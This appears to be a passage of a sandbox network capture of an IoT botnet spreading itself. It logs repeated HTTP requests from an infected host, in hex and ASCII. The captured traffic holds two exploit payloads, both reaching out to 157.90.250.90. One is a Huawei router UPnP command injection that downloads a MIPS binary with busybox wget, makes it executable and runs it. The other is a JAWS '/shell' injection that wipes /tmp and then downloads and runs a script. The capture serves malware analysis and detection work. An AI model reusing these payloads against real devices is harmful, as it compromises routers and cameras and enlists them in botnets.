                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:11.302711964 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:19.237591982 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:35.111351013 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          449192.168.2.2339418146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:03.551383972 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 35 3a 30 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:25:03Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          450192.168.2.233301835.231.230.6080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:03.820713997 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          451192.168.2.234219620.65.30.21280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:03.828275919 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          452192.168.2.2339444146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:03.879776001 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 35 3a 30 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:25:03Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          453192.168.2.2335330146.148.255.22880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:03.972569942 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          454192.168.2.235602852.24.96.4480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:04.184391022 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          455192.168.2.23481042.19.103.22080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:04.208897114 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:04.447567940 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:04 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:04 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 37 36 30 31 33 30 32 26 23 34 36 3b 31 37 30 34 31 37 33 31 30 34 26 23 34 36 3b 32 36 38 35 31 33 34 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;17601302&#46;1704173104&#46;26851341</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          456192.168.2.2339458146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:04.209218025 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 35 3a 30 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:25:03Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          457192.168.2.2358590175.126.123.11680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:04.257668972 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:04.549006939 CET394INHTTP/1.1 403 Forbidden
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:04 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 214
                                                          Connection: keep-alive
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          458192.168.2.2354570183.111.183.23080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:04.271399975 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          459192.168.2.233384454.179.83.5280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:04.468215942 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          460192.168.2.23494442.189.137.1780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:04.484177113 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:04.797456026 CET443INHTTP/1.1 403 Forbidden
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 337
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 36 22 3e 3c 74 69 74 6c 65 3e 4e 54 4c 33 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 31 30 2e 31 30 2e 33 34 2e 33 36 2f 3f 74 79 70 65 3d 49 6e 76 61 6c 69 64 20 4b 65 79 77 6f 72 64 26 70 6f 6c 69 63 79 3d 4d 61 69 6e 50 6f 6c 69 63 79 20 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 76 73 70 61 63 65 3d 22 30 22 20 68 73 70 61 63 65 3d 22 30 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><title>NTL3</title></head><body><iframe src="http://10.10.34.36/?type=Invalid Keyword&policy=MainPolicy " style="width: 100%; height: 100%" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0"></iframe></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          461192.168.2.2339484146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:04.536232948 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 35 3a 30 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:25:04Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          462192.168.2.2339498146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:04.865444899 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 35 3a 30 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:25:04Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          463192.168.2.233293650.228.64.4980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:04.956264019 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          464192.168.2.233317023.217.78.18480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:04.964746952 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:05.131223917 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
